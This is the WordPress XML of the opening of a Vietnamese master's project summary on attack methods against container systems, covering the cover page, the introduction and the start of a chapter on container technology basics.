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8E38C" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4830">
      <w:pPr>
        <w:spacing w:before="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FA4830" w:rsidSect="00FA4830">
          <w:headerReference w:type="even" r:id="rId8"/>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:headerReference w:type="first" r:id="rId12"/>
          <w:footerReference w:type="first" r:id="rId13"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1701" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="941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07"/>
        <w:gridCol w:w="5809"/>
      </w:tblGrid>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00CE6B49" w14:paraId="62B13604" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="17"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D60ADAE" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="003B15FC" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5809" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F3C3F4" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00CE6B49" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="0290ABFC" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1070"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43721124" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00622089">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A087C2E" w14:textId="49B011ED" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="00A95152" w:rsidP="00A95152">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00314655">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                                   </w:t>
            </w:r>
            <w:r w:rsidR="002052C6" w:rsidRPr="00A1209F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>---------------------------------------</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="5F07EB31" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1946"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="032289AA" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE605B">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="680AC4F0" wp14:editId="30656EF5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2404644</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>194502</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="980237" cy="1287520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="6" name="Picture 6" descr="C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EE6830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EE6830A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80237" cy="1287520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="3D43728D" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="611"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DD69CA0" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="4CD59160" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="611"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D1BAD41" w14:textId="77777777" w:rsidR="002052C6" w:rsidRDefault="002F69C0">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A95152">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NGUYỄN TUẤN ANH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B09F22" w14:textId="1DBD0A67" w:rsidR="003D12D0" w:rsidRPr="0099472A" w:rsidRDefault="003D12D0">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="1AC96C4D" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1895"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="373F8476" w14:textId="0017CAE9" w:rsidR="002052C6" w:rsidRPr="00E96BDF" w:rsidRDefault="00E96BDF" w:rsidP="00E96BDF">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E96BDF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>NGHIÊN CỨU PHƯƠNG THỨC TẤN CÔNG VÀO HỆ THỐNG CONTAINER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="5CE781EE" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="520"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="603096FD" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00F133D8" w:rsidRDefault="00F133D8" w:rsidP="00F133D8">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F133D8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>Chuyên ngành: KHOA HỌC MÁY TÍNH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C4C79C0" w14:textId="65B7F088" w:rsidR="00F133D8" w:rsidRPr="00F133D8" w:rsidRDefault="00F133D8" w:rsidP="00F133D8">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F133D8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">Mã số: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F133D8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.48.01.01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00991B8C" w14:paraId="4D87B3A8" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="550"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="387076BB" w14:textId="5B535DA0" w:rsidR="002052C6" w:rsidRPr="00F133D8" w:rsidRDefault="00F133D8" w:rsidP="00E96BDF">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F133D8">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>TÓM TẤT ĐỀ ÁN TỐT NGHIỆP THẠC SĨ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="366F5488" w14:textId="77777777" w:rsidTr="00F133D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="2136"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A1BE419" w14:textId="494D4397" w:rsidR="002052C6" w:rsidRDefault="002052C6" w:rsidP="00F133D8">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A1890CF" w14:textId="77777777" w:rsidR="003D12D0" w:rsidRDefault="003D12D0" w:rsidP="00F133D8">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C88589F" w14:textId="77777777" w:rsidR="003D12D0" w:rsidRPr="0099472A" w:rsidRDefault="003D12D0" w:rsidP="00F133D8">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B0A5518" w14:textId="5D2760B4" w:rsidR="002052C6" w:rsidRPr="003D12D0" w:rsidRDefault="00507492" w:rsidP="003D12D0">
            <w:pPr>
              <w:spacing w:before="140" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>HÀ NỘI</w:t>
            </w:r>
            <w:r w:rsidR="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> NĂM </w:t>
            </w:r>
            <w:r w:rsidRPr="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r w:rsidR="00E96BDF" w:rsidRPr="003D12D0">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79CC4C58" w14:textId="42A8CB3C" w:rsidR="001620D1" w:rsidRPr="003D12D0" w:rsidRDefault="001620D1">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6C0815" w14:textId="66021AD5" w:rsidR="00EB7207" w:rsidRPr="004F7BA7" w:rsidRDefault="00CB2369">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc233498080"/>
      <w:r w:rsidRPr="004F7BA7">
        <w:t>MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C4A8ABA" w14:textId="77777777" w:rsidR="003D12D0" w:rsidRPr="003D12D0" w:rsidRDefault="003D12D0" w:rsidP="003D12D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Công nghệ container hóa và kiến trúc vi dịch vụ (Microservices) đang phát triển thần tốc, trở thành tiêu chuẩn cốt lõi trong hạ tầng CNTT hiện đại. Theo Gartner, xu hướng chuyển dịch lên đám mây phân tán dựa trên container đang bùng nổ, dự kiến hơn 90% doanh nghiệp toàn cầu sẽ triển khai container trong môi trường sản xuất vào cuối năm 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8E5AD" w14:textId="77777777" w:rsidR="003D12D0" w:rsidRDefault="003D12D0" w:rsidP="003D12D0">
      <w:r>
        <w:t>Sự phát triển bùng nổ này kéo theo những thách thức an ninh mạng phức tạp. Bản chất của các microservices là tối giản tài nguyên và độ trễ, khiến các giải pháp bảo mật truyền thống thường gây suy giảm hiệu năng nghiêm trọng. Điều này vô tình tạo ra "khe hở" để tin tặc khai thác thông qua các kỹ thuật tinh vi như tấn công thoát chuồng (container escape), lạm dụng đặc quyền hoặc xâm nhập mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4FEB18" w14:textId="77777777" w:rsidR="003D12D0" w:rsidRDefault="003D12D0" w:rsidP="003D12D0">
      <w:r>
        <w:t xml:space="preserve">Xuất phát từ thực tế đó, đề án </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Nghiên cứu phương thức tấn công vào hệ thống container”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> được thực hiện với mục tiêu nghiên cứu sâu các véc-tơ đe dọa và cơ chế xâm nhập thực tế. Trên cơ sở đó, đề án đề xuất mô hình giám sát và cấu hình phòng thủ toàn diện, đảm bảo khả năng bảo mật kiên cố nhưng vẫn giữ được sự trong suốt và tối ưu tuyệt đối về hiệu năng vận hành cho hạ tầng doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15616CC4" w14:textId="184FE931" w:rsidR="00704A61" w:rsidRPr="000A54C5" w:rsidRDefault="00704A61" w:rsidP="001430E0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5928D56D" w14:textId="77777777" w:rsidR="004F7BA7" w:rsidRDefault="004F7BA7">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C26BF" w14:textId="77777777" w:rsidR="00FA4830" w:rsidRDefault="00FA4830" w:rsidP="005062A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:sectPr w:rsidR="00FA4830" w:rsidSect="00FA4830">
          <w:headerReference w:type="default" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1701" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc233498081"/>
    </w:p>
    <w:p w14:paraId="579622A5" w14:textId="2D5ACE77" w:rsidR="004F7BA7" w:rsidRPr="000A54C5" w:rsidRDefault="004F7BA7" w:rsidP="005062A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7BA7">
        <w:lastRenderedPageBreak/>
        <w:t>CƠ SỞ LÝ LUẬN VỀ CÔNG NGHỆ CONTAINER VÀ KIẾN TRÚC HỆ THỐNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="56D56EEB" w14:textId="43E02CB4" w:rsidR="00314655" w:rsidRPr="009E0111" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc233498082"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="45FE8961" w14:textId="063C7C3B" w:rsidR="00D9170A" w:rsidRPr="00D9170A" w:rsidRDefault="00D9170A" w:rsidP="00D9170A">
      <w:bookmarkStart w:id="3" w:name="_Toc233498083"/>
      <w:r w:rsidRPr="00D9170A">
        <w:t>Để nghiên cứu toàn diện các véc-tơ tấn công, Chương 1 xây dựng nền tảng lý luận về kiến trúc container thông qua việc so sánh với máy ảo, làm rõ các thành phần hệ sinh thái và phân tích hai cơ chế bảo mật cốt lõi của nhân Linux là Namespaces và cgroups. Những cơ sở này đóng vai trò kim chỉ nam giúp làm sáng tỏ các cơ chế tấn công ở những phần tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F3775" w14:textId="18606B3C" w:rsidR="009F2546" w:rsidRPr="009E0111" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009E0111">
        <w:t>Tổng quan về công nghệ Container hóa (Containerization)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4E3F3B7A" w14:textId="2D8A0ECF" w:rsidR="009F2546" w:rsidRPr="002B4188" w:rsidRDefault="009F2546" w:rsidP="003D12D0">
      <w:r w:rsidRPr="009F2546">
        <w:t>Công nghệ container hóa (containerization) tối ưu hóa hiệu suất sử dụng tài nguyên hệ thống, cho phép triển khai đồng thời đa ứng dụng trên một máy chủ vật lý duy nhất. Giải pháp này đảm bảo tính độc lập tuyệt đối của môi trường thực thi, loại bỏ sự phụ thuộc và các giới hạn phân mảnh phiên bản từ hệ điều hành (OS) của máy chủ.</w:t>
      </w:r>
      <w:r w:rsidR="002B4188" w:rsidRPr="002B4188">
        <w:t xml:space="preserve"> Một công nghệ hữu ích xuất phát từ những nhu cầu thực tế dưới đây là một số cột mốc trong quá trình định hình và phát triển</w:t>
      </w:r>
      <w:r w:rsidR="003D12D0" w:rsidRPr="003D12D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4188" w:rsidRPr="002B4188">
        <w:t>của “Containerization”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21309503" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="002B4188" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79695132" wp14:editId="7D026E18">
            <wp:extent cx="4885898" cy="2246179"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1290304338" name="Picture 1" descr="Understanding Container Technology: The Future of Application Deployment |  by JI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Understanding Container Technology: The Future of Application Deployment |  by JIN | Mediu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91519" cy="2248763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
